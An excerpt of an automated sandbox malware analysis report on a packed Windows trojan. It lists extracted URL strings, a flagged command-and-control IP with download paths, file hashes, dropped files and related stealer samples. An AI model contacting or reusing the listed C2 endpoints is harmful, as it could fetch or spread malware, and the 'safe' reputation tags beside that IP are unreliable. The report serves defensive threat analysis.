                                                      https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://pypi.org/project/build/).DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerDChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://foo/bar.tgzDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/python/cpython/issues/86361.DChOtFdp9T.exe, 00000001.00000003.1710316814.000001780A0E6000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715918699.000001780A0B7000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710387124.000001780A08B000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1710245144.000001780A0DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://httpbin.org/DChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B6D000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.apache.org/licenses/DChOtFdp9T.exe, 00000000.00000003.1690343606.00000260D1CD5000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drfalse
                                                                    		high
                                                                    https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainDChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                      		high
                                                                      https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gzDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsTheDChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-theDChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A0FD000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715054087.000001780A108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cryptography.io/en/latest/installation/DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                		high
                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syDChOtFdp9T.exe, 00000001.00000002.1872477031.0000017809B13000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1707814003.0000017809B41000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.python.org/psf/license/DChOtFdp9T.exe, 00000001.00000002.1876630072.00007FFDFB783000.00000004.00000001.01000000.00000005.sdmpfalse
                                                                                    		high
                                                                                    https://docs.python.org/3/library/multiprocessing.htmlDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A667000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/pypa/setuptools/issues/417#issuecomment-392298401DChOtFdp9T.exe, 00000001.00000002.1872660104.0000017809E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://101.42.238.250:443/Ye3l2G7cghlIDChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B294000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://wwwsearch.sf.net/):DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/python/importlib_metadata/wiki/Development-MethodologyDChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warningsDChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://cryptography.io/en/latest/security/DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                		high
                                                                                                https://cffi.readthedocs.io/en/latest/using.html#callbacks_cffi_backend.cp312-win_amd64.pyd.0.drfalse
                                                                                                  		high
                                                                                                  https://bugs.python.org/issue44497.DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://packaging.python.org/specifications/entry-points/DChOtFdp9T.exe, 00000001.00000002.1872935863.000001780A250000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/jaraco/jaraco.functools/issues/5DChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.python.org/psf/license/)DChOtFdp9T.exe, 00000001.00000002.1876269235.00007FFDFB5F0000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                          		high
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyDChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.rfc-editor.org/info/rfc7253DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/pyca/cryptography/issuesMETADATA.0.drfalse
                                                                                                                		high
                                                                                                                http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdfDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://readthedocs.org/projects/cryptography/badge/?version=latestDChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                    		high
                                                                                                                    http://google.com/DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://mahler:8092/site-updates.pyDChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://.../back.jpegDChOtFdp9T.exe, 00000001.00000002.1874304688.000001780B8B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tools.ietf.org/html/rfc5869DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/pyca/cryptographyDChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                		high
                                                                                                                                http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.htmlDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873887665.000001780AFB0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cryptography.io/METADATA.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://httpbin.org/postDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/pyca/cryptography/DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                        		high
                                                                                                                                        http://101.42.238.250/b.txtng.utilsDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://github.com/urllib3/urllib3/issues/497DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://101.42.238.250:443/Ye3lDChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2E0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874160118.000001780B2B5000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872301764.000001780820B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://yahoo.com/DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714923767.000001780A5B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://w3c.github.io/html/sec-forms.html#multipart-form-dataDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://cryptography.io/en/latest/changelog/DChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                		high
                                                                                                                                                http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdfDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://mail.python.org/mailman/listinfo/cryptography-devDChOtFdp9T.exe, 00000000.00000003.1689864295.00000260D1CD7000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tools.ietf.org/html/rfc5297DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://upload.pypi.org/legacy/DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://docs.python.org/library/itertools.html#recipesDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873535228.000001780A980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://tools.ietf.org/html/rfc4880DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://peps.python.org/pep-0685/DChOtFdp9T.exe, 00000001.00000002.1873602922.000001780AA90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://requests.readthedocs.ioDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdfDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaDChOtFdp9T.exe, 00000001.00000002.1873820531.000001780AEB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873467109.000001780A860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://github.com/pypa/setuptools/issues/1024.DChOtFdp9T.exe, 00000001.00000002.1873399902.000001780A750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.python.orgDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/DChOtFdp9T.exe, 00000001.00000003.1711960046.000001780A3DF000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715551471.000001780A461000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1711700382.000001780A3B0000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A350000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A3A1000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714396387.000001780A461000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1872730547.0000017809F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.tarsnap.com/scrypt/scrypt-slides.pdfDChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B108000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfDChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A5A3000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B1FB000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B026000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAF0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874237910.000001780B7B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873004013.000001780A688000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780BA6C000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874500664.000001780BAB0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000002.1873926213.000001780B04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.python.org/DChOtFdp9T.exe, 00000001.00000002.1872730547.000001780A0FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://json.orgDChOtFdp9T.exe, 00000001.00000003.1715097518.000001780A356000.00000004.00000020.00020000.00000000.sdmp, DChOtFdp9T.exe, 00000001.00000003.1714766662.000001780A063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://requests.readthedocs.ioeDChOtFdp9T.exe, 00000001.00000002.1874370740.000001780B9B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  101.42.238.250
                                                                                                                                                                                  		unknownChina
                                                                                                                                                                                  		4847CNIX-APChinaNetworksInter-ExchangeCNtrue

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1582596
                                                                                                                                                                                  Start date and time:2024-12-31 01:36:07 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 7m 47s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:DChOtFdp9T.exe
                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                  Original Sample Name:8ee41e146f682cfed19648f1ccb68bfa.exe
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@4/120@0/1
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                  HCA Information:Failed
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                  Warnings

                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.21, 40.126.32.138, 20.12.23.50, 13.107.246.45
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  19:37:17API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  No context

                                                                                                                                                                                  Domains

                                                                                                                                                                                  No context

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  CNIX-APChinaNetworksInter-ExchangeCNbotx.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 101.96.179.105
                                                                                                                                                                                  botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 115.120.35.34
                                                                                                                                                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 36.112.107.189
                                                                                                                                                                                  arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 115.47.87.222
                                                                                                                                                                                  star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 171.87.119.249
                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                  • 117.107.223.16
                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                  • 58.132.185.138
                                                                                                                                                                                  xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 1.93.94.46
                                                                                                                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 116.144.17.4
                                                                                                                                                                                  telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 219.143.102.26

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_Salsa20.pyd3OQL58yflv.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                    7zip.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                                                        main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                              shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                lz4wnSavmK.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                  WVuXCNNYG0.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                    dipwo1iToJ.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher\_ARC4.pyd3OQL58yflv.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                        7zip.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                                                                            main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                ihost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                  shost.exeGet hashmaliciousPython Stealer, Muck StealerBrowse
                                                                                                                                                                                                                    lz4wnSavmK.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                      WVuXCNNYG0.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                        dipwo1iToJ.exeGet hashmaliciousPython StealerBrowse

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DChOtFdp9T.exe_df97346a8c82a5e59b3292889bc2a1cd51fa166d_d7a2af8d_88e3050c-cc34-4862-b2de-1e819ee895ef\Report.wer

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):1.3871923166046165
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:La/2V0I3DkjoR7Gs9kibFizZhN4fL+ESesL73r5GUZxDbDq0rwpSBDcU0Qwbi9lq:e/22I3DkjcmrjbjCzuiF/Y4lO8/
                                                                                                                                                                                                                          MD5:97F45D1E243A58873C5AB487316309DF
                                                                                                                                                                                                                          SHA1:8783984B5865FDFD8C3DAB87E404EA23396B50D5
                                                                                                                                                                                                                          SHA-256:6D4740BDA6DF8B04934AC25DB601A48229AFD5E53938716F58A627ED3C024A80
                                                                                                                                                                                                                          SHA-512:6EED99851C54D3366B6D9E7467256BA210A566831C8F8E1839DD2FDCE57426E78659E9620A242B73C5EF6C01009BE336C9F1B17839738D0A0965555EFC1FBCF2
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Reputation:low
